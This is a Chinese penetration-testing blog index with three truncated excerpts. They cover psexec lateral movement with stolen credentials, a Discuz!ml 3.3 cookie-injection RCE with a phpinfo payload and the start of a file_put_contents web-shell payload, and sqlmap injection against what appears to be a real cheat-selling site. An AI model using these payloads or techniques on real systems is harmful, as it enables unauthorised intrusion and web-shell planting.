News:禁止使用本博客的技术文章、源码、工具等用于非法用途,否则后果自负。

The Lastest

渗透测试,内网渗透

内网渗透中PSTools套件的使用

jasonx 617 1

前言我本人在内网渗透中,经常会用到PSTools。在内网中很多win7电脑,知道对方密码但无法直接远程登录的情况下,psexec的优势就体现出来了。psexec.exepsexec.exe是一个远程执行工具,知道对方账号密码即可远程执行命令,运行程序等等。常用参数说明-u 输入对方用户名-p 输入对方密码-d 无需等待程序执行完,直接返回。-s 以system权限运行-i 让对方看到你运行的程序窗口-c 运行对方电脑里...

漏洞研究

Discuz!ml3.3前台命令执行漏洞 可getshell

jasonx 828 1

代码执行访问127.0.0.1/home.php,访问其他文件也可以。cookie字段中会出现xxxx_xxxx_language字段,根本原因就是这个字段存在注入,导致的RCE抓包找到cookie的language的值修改为xxxx_xxxx_language=sc'.phpinfo().' getshell%27.%2Bfile_put_contents%28%27shell.php%27%2Curldecode%28%27%...

渗透测试,漏洞研究

吃鸡外挂要钱?不存在的兄弟

jasonx 543 0

前言:某表哥发了一个某吃鸡外挂的发卡平台注入点,我个人对外挂没啥好感,毕竟太破坏游戏体验了,然后就顺手跑一下。0x01 sqlmap走起这是一个post注入,我们把通过burp抓到的请求复制到一个txt文件里面,然后放到c盘根目录下。POST /index.php/Home/Index/ajaxname HTTP/1.1 Content-Length: 71 Content-Type: application/x-www-form...